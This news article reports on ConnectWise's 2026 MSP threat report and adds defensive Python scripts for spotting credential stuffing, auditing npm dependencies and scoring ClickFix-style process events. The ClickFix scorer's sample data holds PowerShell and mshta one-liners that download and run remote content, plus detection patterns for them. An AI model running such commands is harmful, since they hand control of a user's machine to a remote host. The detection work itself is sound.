MSPs warned as cyber criminals weaponise trusted access
New research from ConnectWise finds cyber criminals are shifting away from novel software exploits and instead targeting the trust relationships at the centre of managed service provider (MSP) networks.
The '2026 Managed Service Provider Threat Report' reviews activity observed during 2025 and identifies identity abuse, misuse of legitimate tools, weaknesses in remote access infrastructure, and software supply chain attacks as key entry routes into MSP-managed environments.
The report also says attackers are applying long-running tactics at greater pace and scale through increased use of artificial intelligence. AI rarely shows up directly in incident telemetry; investigators instead see its effects in more convincing phishing, more realistic fraud attempts, faster malware iteration and broader operational efficiency.
Identity abuse
The report describes a "decisive shift" in strategy, with adversaries using valid credentials and inherited trust to move quickly through environments MSPs manage for customers. This approach can scale across many tenants when remote access methods and administrative practices are repeated across client estates.
Patrick Beggs, ConnectWise's chief information security officer, described the trend as trust being turned into an attack surface.
"The defining theme of 2025 was the abuse of trust," said Beggs.
Ransomware patterns
Ransomware remained a central risk for MSPs and their customers, with activity reaching record levels in the final quarter of 2025, the year's most dangerous period. Attackers favoured speed over new encryption techniques.
ConnectWise's analysis says ransomware groups refined both their initial access methods and the speed at which they could disrupt operations. The report highlights a "scan, steal, encrypt" lifecycle and notes a focus on early attacks against backup infrastructure. Disrupting backups can block recovery options and increase pressure on victims during negotiations.
The report also cites attempts to bypass one-time-password (OTP) multi-factor authentication, including abuse of VPN configuration artefacts and retained appliance secrets to regain access after an initial foothold was lost.
VPN entry points
Remote access infrastructure emerged as a recurring entry point, with public-facing SSL VPN interfaces repeatedly targeted. The report cites credential stuffing, inherited secrets and critical vulnerabilities affecting major vendors. In several cases, attackers moved from successful VPN authentication to full domain compromise within hours.
This rapid progression compresses the time defenders have to respond and increases remediation costs, as privilege escalation and lateral movement can spread across a wide estate before security teams can isolate affected systems.
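The credential stuffing described above leaves a recognisable pattern in VPN authentication logs: one source address failing against many distinct accounts, and, in the worst case, a success after the failures. The triage script below is an added example and not code from the ConnectWise report; the syslog-like line format and the sample lines are constructed for illustration, and the thresholds are assumptions a team would tune to its own appliance.

```python
"""Credential-stuffing triage for SSL VPN authentication logs (added example).

The log format and sample lines below are constructed; real appliances use
vendor-specific formats, so the regex is the part to adapt.
"""
from collections import defaultdict
import re

# Constructed sample lines. Field layout is an assumption for this example.
SAMPLE_LOG = """\
2025-11-03T08:00:01Z vpn1 auth user=alice src=203.0.113.7 result=FAIL
2025-11-03T08:00:03Z vpn1 auth user=bob src=203.0.113.7 result=FAIL
2025-11-03T08:00:05Z vpn1 auth user=carol src=203.0.113.7 result=FAIL
2025-11-03T08:00:07Z vpn1 auth user=dave src=203.0.113.7 result=FAIL
2025-11-03T08:00:09Z vpn1 auth user=erin src=203.0.113.7 result=FAIL
2025-11-03T08:00:11Z vpn1 auth user=frank src=203.0.113.7 result=FAIL
2025-11-03T08:00:13Z vpn1 auth user=svc-backup src=203.0.113.7 result=OK
2025-11-03T08:01:00Z vpn1 auth user=alice src=198.51.100.20 result=FAIL
2025-11-03T08:01:10Z vpn1 auth user=alice src=198.51.100.20 result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ auth user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\S+)$"
)


def parse(log_text):
    """Return a list of dicts (ts, user, src, result); lines that do not match are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def find_stuffing(events, min_users=5):
    """Flag source addresses that failed against at least min_users distinct accounts.

    Returns {src: {"distinct_users": n, "failures": n, "success_after": [users]}}.
    "success_after" lists accounts that authenticated from that source only after
    the failure threshold had already been crossed: the case that, per the report,
    can precede domain compromise within hours and deserves immediate escalation.
    """
    by_src = defaultdict(lambda: {"failed_users": set(), "failures": 0, "success_after": []})
    for ev in events:
        s = by_src[ev["src"]]
        if ev["result"] == "FAIL":
            s["failed_users"].add(ev["user"])
            s["failures"] += 1
        elif ev["result"] == "OK" and len(s["failed_users"]) >= min_users:
            s["success_after"].append(ev["user"])
    alerts = {}
    for src, s in by_src.items():
        if len(s["failed_users"]) >= min_users:
            alerts[src] = {
                "distinct_users": len(s["failed_users"]),
                "failures": s["failures"],
                "success_after": s["success_after"],
            }
    return alerts


if __name__ == "__main__":
    for src, info in find_stuffing(parse(SAMPLE_LOG)).items():
        print(src, info)
```

The single user retrying from 198.51.100.20 is not flagged, because the signal is breadth across accounts rather than raw failure count; a source that sprays six names and then succeeds as a service account is the pattern to page on.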
Supply chain risk
The report says software supply chain compromise increased downstream risk, including campaigns that used automation and scale to compromise maintainer accounts in open source ecosystems.
It highlights "Shai-Hulud" as an example, stating that npm maintainer accounts were compromised and trojanised updates then propagated across thousands of downstream environments. The report also describes phishing and malicious package-injection campaigns targeting other ecosystems, including PyPI, NuGet, RubyGems and the Rust crate registry.
These attacks can turn routine dependency updates into an execution path for malicious code. The report says the risk is particularly relevant for MSPs and their customers because they rely on third-party software and repeatable deployment practices across many organisations.
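A routine update only becomes an execution path if the manifest allows a newer release to be pulled in silently and nothing verifies what arrives. The audit below is an added example, not code from the report or from any of the ecosystems it names; it checks an npm `package.json` for floating version ranges and a `package-lock.json` for entries with no `integrity` hash or with install-time scripts (the lockfile's real `hasInstallScript` field). Both files are constructed inline and the package names are illustrative.

```python
"""Audit an npm manifest and lockfile for the update paths a trojanised
release could ride in on (added example; inputs are constructed)."""
import json
import re

# Constructed manifest: two of three dependencies float to newer releases.
PACKAGE_JSON = json.dumps({
    "name": "example-app",
    "dependencies": {
        "left-pad-ish": "^1.3.0",   # caret range: a malicious 1.3.1 would be accepted
        "tiny-util": "1.0.2",       # exact pin
        "any-thing": "*",           # wildcard: any published version at all
    },
})

# Constructed lockfile (v3 layout). Hashes are placeholders, not real digests.
PACKAGE_LOCK = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app"},
        "node_modules/left-pad-ish": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad-ish/-/left-pad-ish-1.3.0.tgz",
            "integrity": "sha512-AAAA",
            "hasInstallScript": True,   # runs code at install time
        },
        "node_modules/tiny-util": {
            "version": "1.0.2",
            "resolved": "https://registry.npmjs.org/tiny-util/-/tiny-util-1.0.2.tgz",
            "integrity": "sha512-BBBB",
        },
        "node_modules/any-thing": {
            "version": "2.0.0",
            "resolved": "https://registry.npmjs.org/any-thing/-/any-thing-2.0.0.tgz",
            # no "integrity": nothing to verify the downloaded tarball against
        },
    },
})

# Exact semver (optionally with a pre-release or build suffix); anything else floats.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")
SECTIONS = ("dependencies", "devDependencies", "optionalDependencies")


def unpinned_ranges(manifest_text):
    """Return {name: spec} for every dependency whose spec is not an exact version."""
    manifest = json.loads(manifest_text)
    findings = {}
    for section in SECTIONS:
        for name, spec in manifest.get(section, {}).items():
            if not EXACT_VERSION.match(spec):
                findings[name] = spec
    return findings


def lockfile_findings(lock_text):
    """Return packages lacking an integrity hash and packages that run install scripts."""
    lock = json.loads(lock_text)
    missing_integrity, install_scripts = [], []
    for path, entry in lock.get("packages", {}).items():
        if path == "":            # the root project entry
            continue
        name = path.rsplit("node_modules/", 1)[-1]
        if "integrity" not in entry:
            missing_integrity.append(name)
        if entry.get("hasInstallScript"):
            install_scripts.append(name)
    return {"missing_integrity": missing_integrity, "install_scripts": install_scripts}


if __name__ == "__main__":
    print("unpinned:", unpinned_ranges(PACKAGE_JSON))
    print("lockfile:", lockfile_findings(PACKAGE_LOCK))
```

Pinning and integrity hashes stop a silently swapped release; they do not stop a maintainer whose account was taken over from publishing a version you later choose to adopt, so the install-script list is the set of packages whose upgrades warrant a diff before `npm ci` runs them (or that can be installed with `npm ci --ignore-scripts` where the package works without its hooks).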
Social engineering
Alongside infrastructure and supply chain routes, the report describes "ClickFix" and similar user-mediated execution tactics as a repeatable intrusion method. In these scenarios, attackers persuade users to copy and paste malicious commands into legitimate utilities, shifting execution to the user and bypassing some traditional controls.
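Because the user, not a dropper, launches the command, ClickFix-style execution is easiest to catch in process-creation telemetry rather than at the file or e-mail layer. The scorer below is an added example and not from the report: it runs over constructed process-creation events (the field names are assumptions; Sysmon Event ID 1 and EDR process trees carry equivalents) and flags a script host spawned directly from the user's desktop shell whose command line fetches or evaluates remote content. The heuristic itself is an assumption about how such pasted commands commonly look, not something the report specifies.

```python
"""Score process-creation events for user-mediated ("ClickFix"-style) execution.

Added example. Events are constructed; the field names and the heuristic are
assumptions to be mapped onto real telemetry (e.g. Sysmon Event ID 1).
"""
import re

# Constructed events: parent process, child image and full command line.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://198.51.100.9/x.txt|iex"'},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta http://203.0.113.50/verify.hta"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},   # scheduled admin script
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Get-Process"},                     # user poking around
]

INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# Indicators that the command line pulls content from the network or
# evaluates text as code; each alone is benign often enough to need a second signal.
REMOTE_FETCH = re.compile(
    r"https?://|\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression|-enc\b",
    re.I,
)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def score(event):
    """Return the list of reasons an event looks like pasted, user-run malicious code."""
    reasons = []
    if (event["parent"].lower() in INTERACTIVE_PARENTS
            and event["image"].lower() in SCRIPT_HOSTS):
        reasons.append("script host launched from interactive shell")
    if REMOTE_FETCH.search(event["cmdline"]):
        reasons.append("command line fetches or evaluates remote content")
    if HIDDEN_WINDOW.search(event["cmdline"]):
        reasons.append("hidden window requested")
    return reasons


def suspicious(events, min_reasons=2):
    """Events with at least min_reasons signals, as (cmdline, reasons) pairs."""
    return [(e["cmdline"], score(e)) for e in events if len(score(e)) >= min_reasons]


if __name__ == "__main__":
    for cmdline, reasons in suspicious(SAMPLE_EVENTS):
        print(cmdline, "->", reasons)
```

Requiring two signals keeps an administrator running `Get-Process` from a desktop shortcut out of the queue while still surfacing the `mshta` case, which has no hidden-window flag but fetches an HTA from the network. The parent-process condition is the part that survives when the attacker changes the lure text.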
Security posture
ConnectWise argues that reactive security models "consistently failed" in MSP environments, with detection after execution often arriving too late. The report says organisations with limited identity monitoring, weak application controls or poor visibility into execution context saw the greatest impact.
It also lists areas ConnectWise says need more attention across MSP operations, including identity security, privileged access governance, behavioural detection and resilience.
Beggs said, "Attackers are exploiting valid credentials, misconfigured VPNs, trusted updates, and even user behavior to gain access to systems and data. For MSPs, this means identity security, privileged access governance, and early behavioral detection must be foundational. At ConnectWise, we're continuously evolving our platform to help customers ensure trust and transparency across the environments they manage."
ConnectWise says its platform roadmap includes work across privileged access management, managed endpoint detection and response, security information and event management, and business continuity and disaster recovery with immutable backups.
The report was produced by the ConnectWise Cyber Research Unit, which the company describes as a team that gathers intelligence from incident work, customer telemetry, ransomware leak sites and malicious infrastructure monitoring.